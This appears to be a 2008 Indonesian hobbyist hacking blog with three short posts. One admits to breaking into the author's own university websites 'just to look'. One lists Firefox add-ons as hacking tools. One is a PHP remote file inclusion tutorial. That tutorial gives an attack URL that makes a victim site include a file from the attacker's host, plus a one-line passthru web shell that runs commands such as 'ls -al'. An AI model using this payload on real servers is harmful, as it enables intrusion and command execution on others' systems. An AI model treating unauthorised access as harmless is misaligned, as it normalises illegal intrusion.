Upss………

31 Januari 2008

Sory, bukannya aku mo h**k kampus sendiri, tp aku cuman mo liat, eh malah bisa masuk. Ini hasilnya :

Lemlit
Dosen
alumni

Tapi aku nggak ngapain2 kok, suer….Jadi bwt adminnya segela diperbaiki, ada vul di webnya.


Addons Mozilla sbg Tools H***ck

30 Januari 2008

Add ons Mozilla yg dapat dimanfaatkan sbgt tools h***ck dkk :

  1. HackBar [ https://addons.mozilla.org/en-US/firefox/addon/3899 ]
  2. FireBug [ https://addons.mozilla.org/en-US/firefox/addon/1843 ]
  3. Anonymouser [ https://addons.mozilla.org/en-US/firefox/addon/1415 ]
  4. Whois [ https://addons.mozilla.org/en-US/firefox/addon/603 ]
  5. Web Developer [ https://addons.mozilla.org/en-US/firefox/addon/60 ]

Baca entri selengkapnya »


PHP Injection

22 Januari 2008

Sudah banyak artikel2 yang membahas PHP injection. Salah satu command yang sering dipergunakan dalam aksi ‘php injection’ adalah ‘ls -al’ untuk melihat isi direktori. Seperti misalnya:
http://www.korban.com/index.php?page=http://www.situsku.com/cmd.txt &?cmd=ls -al

Dimana isi dari http://www.situsku.com/cmd.txt adalah
// begin of cmd.txt
<? passthru($_GET[cmd]); ?>
// end of cmd.txt

Namun, terkadang aksi itu gagal, tidak menghasilkan apapun atau hanya menghasilkan error. Salah satu kemungkinan penyebab kegagalan, fungsi dari passthru di’disable’ oleh sang admin. Tentunya hal ini dilakukan oleh sang admin dengan alasan keamanan. Tapi kita bisa mengakalinya dengan membuat script untuk melihat isi direktori.

Berikut script yang penulis modifikasi dari php manual:

Baca entri selengkapnya »